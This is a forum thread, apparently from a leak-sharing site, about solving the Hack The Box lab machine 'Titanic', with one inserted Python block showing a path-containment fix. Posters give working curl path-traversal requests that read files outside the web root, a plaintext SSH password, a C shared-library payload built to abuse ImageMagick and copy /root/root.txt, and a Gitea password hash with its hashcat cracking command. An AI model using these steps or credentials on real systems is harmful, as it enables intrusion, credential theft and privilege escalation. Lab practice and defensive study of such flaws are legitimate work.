Titanic Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday February 15, 2025 at 02:59 PM
#31
how did you know the location of gitea.db?
Reply
#32
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google
Reply
#33
I am still confused as to how we did the root thing
Reply
#34
(Feb 16, 2025, 01:24 AM)samuelballsiu1 Wrote:
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

Check the gitea config repository of the developer and google

Sorry, silly mistake. Try to bruteforce with dirsearch, where the dev subdomain is certainly open.

Next question: how do I find any clue for priv esc? I'm running linpeas but haven't found anything interesting.
Reply
#35
(Feb 15, 2025, 07:17 PM)LostGem Wrote: user flag
curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: titanic.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://titanic.htb/' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \
    $'http://titanic.htb/download?ticket=/home/developer/user.txt'


Copied from burp. Directly point ticket=/home/developer/user.txt works.
Reply
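Why the `../` form and the bare absolute path both reach the same file, and a containment check that rejects both, as an added example that is not part of the original posts or the box's code. It assumes the download handler builds its path with a plain join (the thread does not show the handler); `naive_ticket_path`, `safe_ticket_path` and the `/opt/app/tickets` directory are hypothetical names.

```python
import os
import tempfile


class TicketRejected(ValueError):
    """Raised when a ticket name must not be served."""


def naive_ticket_path(base_dir, ticket):
    # Assumed vulnerable pattern: join() keeps "../" segments and, when the
    # ticket is absolute, silently discards base_dir altogether.
    return os.path.normpath(os.path.join(base_dir, ticket))


def safe_ticket_path(base_dir, ticket):
    base = os.path.realpath(base_dir)
    if not ticket or "\x00" in ticket or os.path.isabs(ticket):
        raise TicketRejected("empty, NUL-containing or absolute ticket name")
    # realpath() collapses "../" and follows symlinks before the containment test
    candidate = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, candidate]) != base:
        raise TicketRejected("ticket resolves outside the ticket directory")
    if not os.path.isfile(candidate):
        raise TicketRejected("no such ticket")
    return candidate


def demo():
    """Run the hardened resolver over constructed sample inputs."""
    samples = (
        "abc123.json",                          # constructed legitimate ticket
        "../../../../home/developer/user.txt",  # traversal form from the thread
        "/home/developer/user.txt",             # absolute form from the thread
    )
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "tickets")
        os.mkdir(base)
        with open(os.path.join(base, "abc123.json"), "w") as fh:
            fh.write("{}")
        for ticket in samples:
            try:
                safe_ticket_path(base, ticket)
                results[ticket] = "served"
            except TicketRejected:
                results[ticket] = "rejected"
    return results


if __name__ == "__main__":
    print(naive_ticket_path("/opt/app/tickets", "/home/developer/user.txt"))
    print(demo())
```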
#36
(Feb 16, 2025, 01:06 AM)breached_idn Wrote: how did you know the location of gitea.db?

read docker-compose.yml
Reply
#37
(Feb 15, 2025, 07:58 PM)LostGem Wrote: userflag

curl --path-as-is -s -k "http://titanic.htb/download?ticket=../../../../../../../../../../home/developer/user.txt"
ssh creds for developer
developer : 25282528

Root!

cd /opt/app/static/assets/images
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void init(){
    system("cat /root/root.txt > /tmp/root.txt");
    exit(0);
}
EOF

cp entertainment.jpg root.jpg

cat /tmp/root.txt
How did you find this vulnerability?
Reply
#38
Quote:How did you find this vulnerability?

After finding that script, check magick version and google for vulns, read CVE description and you are ready to go
Reply
#39
So the script in /opt/scripts and the custom PATH for the developer user were only rabbit holes?
Reply
#40
For me, hashcat doesn't like the format the hashes are in after the gitea2hashcat.py script. What is the correct format for the hashes?

For anyone that's having similar issues:

cat developer_hash.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

hashcat -m 10900 --force developer_hash.txt /usr/share/wordlists/rockyou.txt
Reply

